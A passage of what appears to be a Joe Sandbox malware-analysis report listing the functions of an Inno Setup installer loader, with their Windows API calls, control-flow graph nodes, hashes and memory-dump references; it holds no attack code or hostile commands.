                                                                                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                                      • SetWindowLongA.USER32(000801FA,000000FC,00409918), ref: 0040A148
                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                                      • 74075DF0.USER32(000801FA,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastWindow$74075CreateDirectoryLongRemove
                                                                                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                      • API String ID: 1329862005-3001827809
                                                                                                                                                                      • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                      • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                      • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                                                                                      • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                      • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                                                                                                      • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                      • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                                      • SetWindowLongA.USER32(000801FA,000000FC,00409918), ref: 0040A148
                                                                                                                                                                        • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                                                                                        • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90,00000000), ref: 00409A28
                                                                                                                                                                        • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                                        • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                                        • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90), ref: 00409A5C
                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                                      • 74075DF0.USER32(000801FA,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateHandleProcessWindow$74075CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                      • API String ID: 4046991959-3001827809
                                                                                                                                                                      • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                                                                                      • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                                                                                                      • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                                                                                      • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90,00000000), ref: 00409A28
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FF0838,00409A90), ref: 00409A5C
                                                                                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FF0838), ref: 0040966C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                                      • String ID: D
                                                                                                                                                                      • API String ID: 3356880605-2746444292
                                                                                                                                                                      • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                                                                                      • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                                                                                                      • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: .tmp$y@
                                                                                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                                                                                      • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                                                                                      • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                                                                                                      • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: .tmp$y@
                                                                                                                                                                      • API String ID: 2030045667-2396523267
                                                                                                                                                                      • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                      • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                                                                                                                      • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                      • String ID: .tmp
                                                                                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                                                                                      • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                      • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                                                                                                      • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 327 407787 324->327 328 4077f9 324->328 325->326 330 407700-407704 326->330 331 4076f4-4076fb call 4073ec 326->331 332 40778a-40778f 327->332 333 4077fd-407802 327->333 334 40783b-40783d 328->334 335 4077fb 328->335 331->330 339 407803-407819 332->339 341 407791-407792 332->341 333->339 337 407841-407843 334->337 335->333 340 40785b-40785c 337->340 339->340 349 40781b 339->349 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 351 407743 344->351 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 357 407746-407747 351->357 358 4077b9 351->358 353->358 354->328 355->359 357->321 361 4077bb-4077cd 357->361 358->361 363 407898 359->363 364 407824 359->364 360->363 361->337 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->324 383 4077e0 374->383 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 384 4078ae-4078af 379->384 380->334 380->355 381->384 383->354 384->371 385 4078b1-4078bd 384->385 385->363 386 4078bf-4078c0 385->386
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                      • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                                      • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2987862817-0
                                                                                                                                                                      • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                      • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                                      • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                                      • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FF03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                      • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                      • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                                      • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                                      • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1948546556-0
                                                                                                                                                                      • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                      • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FF03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                      • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                      • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                      • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                      • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                      Memory Dump Source
